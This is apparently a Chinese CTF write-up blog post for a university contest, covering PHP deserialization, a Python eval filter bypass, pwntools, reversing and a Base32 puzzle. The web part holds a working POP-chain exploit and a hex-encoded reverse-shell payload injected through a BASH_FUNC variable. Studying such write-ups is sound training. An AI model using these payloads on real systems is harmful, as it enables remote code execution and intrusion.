浙江工商大学校赛

web

PHP签到

<?php
// Challenge source (an intentionally vulnerable CTF target).
// Echo this file's own source into the response.
highlight_file(__FILE__);
// The return value is discarded, so this call has no effect on the page.
ini_get('open_basedir');

/**
 * Holds both ends of the gadget chain in this file: __destruct() is where
 * the chain starts and __invoke() is where it ends in eval().
 */
class yiyi{
    public $Do;
    public $You;
    public $love;
    public $web;

    // Runs when an instance is called like a function.
    // SECURITY: eval() executes $this->web as PHP code. After unserialize()
    // that property is chosen by whoever supplied the serialized data, so
    // this is the code-execution sink of the chain.
    public function __invoke()
    {
        echo "迈进新手村了,接下来往哪走呢"."<br>";
        eval($this->web);
    }

    // Runs during unserialize(): overwrites $web with $love, so the value
    // that reaches eval() above is the one stored in $love.
    public function __wakeup()
    {
        $this->web=$this->love;
    }

    // Runs when the object is destroyed. The assignment targets
    // $this->You->execurise; when You is a whoami instance that property is
    // private there, so the write is routed to whoami::__set().
    public function __destruct()
    {
        die($this->You->execurise=$this->Do);
    }

}

/**
 * Middle link of the gadget chain: its property-overloading hooks turn a
 * property write into a string conversion and a property read into isset().
 */
class whoami{
    private $execurise;
    public $lead;
    public $hansome;

    // Called when code outside the class writes an inaccessible property
    // (for example the private $execurise). $name and $value are ignored;
    // echoing $this->lead converts it to a string, which calls
    // __toString() when it holds an object.
    public function __set($name,$value)
    {
        echo $this->lead;
    }

    // Called when an inaccessible or undefined property is read.
    public function __get($args)
    {
        // Prints /flag directly when that file is readable.
        if(is_readable("/flag")){
            echo file_get_contents("/flag");
        }
        else{
            echo "签到也不带这么签的啊"."<br>";
            // Loose (==) comparison against the private $execurise.
            if ($this->execurise=="man!") {
                echo "胜利就在眼前"."<br>";
                // isset() on a property of $this->hansome; when that property
                // is inaccessible on the target object, its __isset() runs.
                if(isset($this->hansome->lover)){
                    phpinfo();
                }
            }
            else{
                echo($this->execurise);
                echo "搞什么啊,别犯困"."<br>";
            }
        }
    }
}

/**
 * Link used twice in the chain: once through __toString() and once
 * through __call().
 */
class ZJGSU{
    public $girl;
    public $friend;

    // Called when the object is converted to a string. Reading
    // $this->girl->abc hits the __get() hook of the object in $girl when
    // that object has no accessible "abc" property.
    public function __toString()
    {
        return "心中有信仰,脚下有力量"."<br>".$this->girl->abc;
    }

    // Called for any inaccessible or undefined method on this object.
    // Both arguments are ignored; $this->friend is called as a function,
    // which runs __invoke() when it holds an object.
    public function __call($args1,$args2)
    {
        $func=$this->friend;
        $func();
    }

}
/**
 * Link that turns an isset() check into a method call.
 */
class ZJPC{
    private $lover;
    public $forever;

    // Called when isset()/empty() is applied to an inaccessible property
    // (here the private $lover). Calls nononon() on $this->forever; when
    // that object does not define the method, its __call() hook handles it.
    public function __isset($args){
        return $this->forever->nononon();
    }

}


// Entry point: the "web" query parameter is base64-decoded and handed to
// unserialize().
// SECURITY: unserialize() on request data lets the client create instances
// of any class defined above with property values of its choosing, and PHP
// then runs their magic methods (__wakeup, __destruct, ...). For untrusted
// input prefer a data-only format such as json_decode(), or pass the
// allowed_classes option to unserialize() to restrict instantiation.
// Note: $_GET['web'] is read before the isset() check, so a request without
// the parameter reaches the else branch only after an undefined-index notice.
$web=$_GET['web'];
if (isset($web)) {
    // The return value is not stored; the exception below is thrown on
    // every request that supplies the parameter.
    unserialize(base64_decode($web));
    throw new Exception("None");
}else{
    echo("你真的是学web的么");
}
yiyi::__destruct
whoami::__set
ZJGSU::__toString
whoami::__get
ZJPC::__isset
ZJGSU::__call
yiyi::__invoke
// Object graph from the writeup. Each nesting level corresponds to one
// magic method of the challenge classes, in the order listed above.
// NOTE(review): whoami::$execurise and ZJPC::$lover are declared private in
// the challenge listing, so the two assignments to them below are not plain
// property writes when made from outside the class; the writeup does not
// show how the author's local copy handled that.

// Outer object: yiyi::__destruct() writes to You->execurise.
$web=new yiyi();
// whoami::__set() echoes its $lead.
$web->You=new whoami();
// ZJGSU::__toString() reads girl->abc.
$web->You->lead=new ZJGSU();
// whoami::__get() compares $execurise with "man!" and then calls
// isset() on hansome->lover.
$web->You->lead->girl=new whoami();
$web->You->lead->girl->execurise="man!";
// ZJPC::__isset() calls forever->nononon().
$web->You->lead->girl->hansome=new ZJPC();
$web->You->lead->girl->hansome->lover=1;
// ZJGSU::__call() calls $friend as a function.
$web->You->lead->girl->hansome->forever=new ZJGSU();
// yiyi::__invoke() passes $web to eval(); yiyi::__wakeup() first copies
// $love into $web, so the $web value assigned on the last line is replaced
// during unserialize().
$web->You->lead->girl->hansome->forever->friend=new yiyi();
$web->You->lead->girl->hansome->forever->friend->love="system('cat /maybe_1_am_flag');";
$web->You->lead->girl->hansome->forever->friend->web="system('ls');";

POP链构造:按照上面列出的魔术方法顺序把各个对象依次嵌套起来,最终到达 yiyi::__invoke 中的 eval。

calc++

def waf(s):
    """Return True when *s* contains none of the denylisted substrings.

    Matching is case-insensitive and purely textual. The first denylisted
    entry that is found is printed and the scan stops there.

    NOTE(security): this is a substring denylist applied to the raw request
    text. It performs no Unicode normalization, whereas Python applies NFKC
    normalization to identifiers when it parses source, so the text checked
    here is not necessarily the text that ``eval`` ends up acting on. A
    denylist of this kind cannot make ``eval`` of request data safe.
    """
    blacklist = [
        'import', '(', ')', '#', '@', '^', '$', ',', '>', '?', '`', ' ',
        '_', '|', ';', '"', '{', '}', '&', 'getattr', 'os', 'system',
        'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if',
        'subprocess', 'file', 'open', 'popen', 'builtins', 'compile',
        'execfile', 'from_pyfile', 'config', 'local', 'self', 'item',
        'getitem', 'getattribute', 'func_globals', '__init__', 'join',
        '__dict__', '\\x',
    ]
    lowered = s.lower()
    for banned in blacklist:
        if banned.lower() in lowered:
            # Report which entry matched, then reject.
            print(banned)
            return False
    return True


@app.route("/")
def index():
    """Render the landing page from the ``index.html`` template."""
    page = render_template("index.html")
    return page

@app.route("/source")
def source():
    """Return the advertised source of the ``/calc`` handler as text.

    NOTE(review): the embedded text is a hand-kept copy, not the code that
    runs. Its log format string has three placeholders (``{0} {1} {2}``)
    for two arguments, unlike the ``calc`` handler registered in this file.
    """
    # The literal is returned unchanged; it is never executed here.
    return """
@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)

if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"
"""

@app.route("/calc",methods=['GET'])
def calc():
    """Evaluate the ``num`` request parameter and return the result as text.

    Returns ``"waf!!"`` when ``waf(num)`` rejects the input. ``num`` is
    ``None`` when the parameter is absent, and ``waf`` calls ``.lower()``
    on it, so such a request raises before any branch is taken.
    """
    ip = request.remote_addr
    num = request.values.get("num")
    # Shell command line that overwrites ./tmp/log.txt with a timestamp and
    # the client address.
    log = "echo {0} {1}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip)

    if waf(num):
        try:
            # SECURITY: eval() on request data runs arbitrary Python
            # expressions inside the server process; the denylist in waf()
            # is the only barrier. For arithmetic input use a dedicated
            # expression parser, or ast.literal_eval() for plain literals.
            data = eval(num)
            # SECURITY: the log line goes through a shell, which inherits
            # this process's environment, so whatever the eval() above
            # changed is in effect here. Writing the file with open() or
            # the logging module avoids spawning a shell at all.
            os.system(log)
        except:
            # Bare except: every failure, including one raised by eval(),
            # is silently discarded.
            pass
        # If eval() raised, `data` was never bound and this line raises
        # UnboundLocalError.
        return str(data)
    else:
        return "waf!!"

可以看到 /calc 会直接对我们传入的 num 参数执行 eval。根据题目提示给出的“保姆级教程”,可以得到如下 payload 示例:

[[str][0]for[ᵒs.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x27\x78\x27\x78\x27\x78\x27\x78\x27\x78\x2f\x34\x34\x34\x34\x20\x30\x3e\x26\x31\x3b\x7d']]]

但是示例中的 \x 会被waf拦截,所以这里用unicode绕过即可,然后就是反弹shell。waf只是对原始字符串做黑名单匹配,根本问题在于服务端对用户输入直接执行了eval。

RE

逆向的本质

}detacitsihpos_3b_ot_tub_llik_dn@_thg1f_ot_ton_s1_esrever_f0_ecn3sse_ehT{galf

把这个字符串反转(逆序)即可得到flag

Unpack

魔改的UPX,更改UPX的标志位

用IDA分析得到一个字节数组

然后根据算法逆向

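# Byte array taken from the binary. The loop in the original writeup reads
# the first 26 entries as ciphertext and entries 28..31 as a repeating
# 4-byte XOR key; entries 26 and 27 are not used.
tmp=[0x6D,0x68,0x64,0x69,0x70,0x51,0x75,0x76,0x54,0x35,0x76,0x51,0x65,0x34,0x71,0x51,0x6F,0x35,0x63,0x68,0x62,0x67,0x70,0x62,0x7F,0x79,0x0,0x0,0xB,0x4,0x5,0x0E]

FLAG_LEN = 26    # number of ciphertext bytes at the start of tmp
KEY_OFFSET = 28  # index of the first key byte
KEY_LEN = 4

key = tmp[KEY_OFFSET:KEY_OFFSET + KEY_LEN]
# XOR each ciphertext byte with the key byte at the same position mod 4.
decoded = "".join(
    chr(byte ^ key[pos % KEY_LEN]) for pos, byte in enumerate(tmp[:FLAG_LEN])
)
print(decoded, end="")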

得到flag

PWN

math_game

简单的 pwntools 脚本交互

from pwn import *
# pwntools settings: 64-bit Linux target, debug-level logging.
context(arch='amd64',os='linux',log_level='debug')

# Connect to the challenge service.
io = remote('124.221.156.93',32936)

# Wait for the banner line ending in "challenge." and send an empty line.
io.recvuntil("challenge.\n")
io.sendline("")

# Read up to and including '=' (5 s timeout), then drop the trailing '='.
data = io.recvuntil(delims=b"=",timeout=5)
data = data[:-1].decode()
# '/' becomes '//' so Python evaluates division as floor division
# (presumably the service expects integer answers -- confirm).
data = data.replace('/', '//')
data = data.replace(' ', '')
data = data.replace('\n', '')
print("接受到了",data)
# SECURITY: `data` is whatever the remote service sent. eval() executes it
# as a Python expression on the machine running this script, so the script
# fully trusts the server. A restricted evaluator (walk
# ast.parse(data, mode="eval") and accept only numeric constants and
# arithmetic operators) removes that trust.
a = eval(data)
print("运算后",a)
io.sendline(str(a))
io.recvuntil("shell...\n")
io.sendline("cat flag")
# The return value is discarded; the received bytes are only visible
# through the debug-level log output.
io.recvall()

Misc

Maze Hunter

跟着顺序一个一个找就行了

密码学

密码是什么?可以拿来吃嘛🤓


import base64

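# Base32 alphabet: the symbol at index i is written as the 5-bit binary
# form of i with 0 -> 'a' and 1 -> 'b'.
symbols = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
# Ciphertext from the challenge: one 5-letter a/b group per Base32 symbol.
flag=["abbaa","bbaab","babba","aabba","aaaba","bbaab","bbabb","bbabb","bbbab","aabba","aaaab","bbabb","bbabb","bbaab","aabab","bbaaa","baaab","babbb","baabb","bbaab","baabb","abbbb","abbbb","aabba","baabb","babba","baaba","babab","bbbbb","bbaab","aabab","bbaaa","baaab","babbb","babaa","bbaaa","aabbb","abbbb","abbbb","aabba","baabb","babba","baaba","bbbba","abbbb","aabba","abbab","bbbab","abbbb","babaa"]

codes = [format(i, '05b').replace('0','a').replace('1','b') for i in range(32)]
print(codes)
enc_map = dict(zip(symbols, codes))
dec_map = {code: sym for sym, code in enc_map.items()}
print(dec_map)

# Step 1: map every group back to its Base32 symbol.
encoded = "".join(dec_map[group] for group in flag)
print(encoded)

# Step 2: Base32-decode. b32decode() requires the input length to be a
# multiple of 8, so the stripped '=' padding is restored first.
padded = encoded + "=" * (-len(encoded) % 8)
decoded = base64.b32decode(padded).decode("utf-8")
print(decoded)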

五个字符一组,根据解密映射表(dec_map)还原出base32字符串,再做base32解码即可得到flag


浙江工商大学校赛
https://lvyzcc.github.io/2025/05/15/校赛/
作者
LvYz
发布于
2025年5月15日
许可协议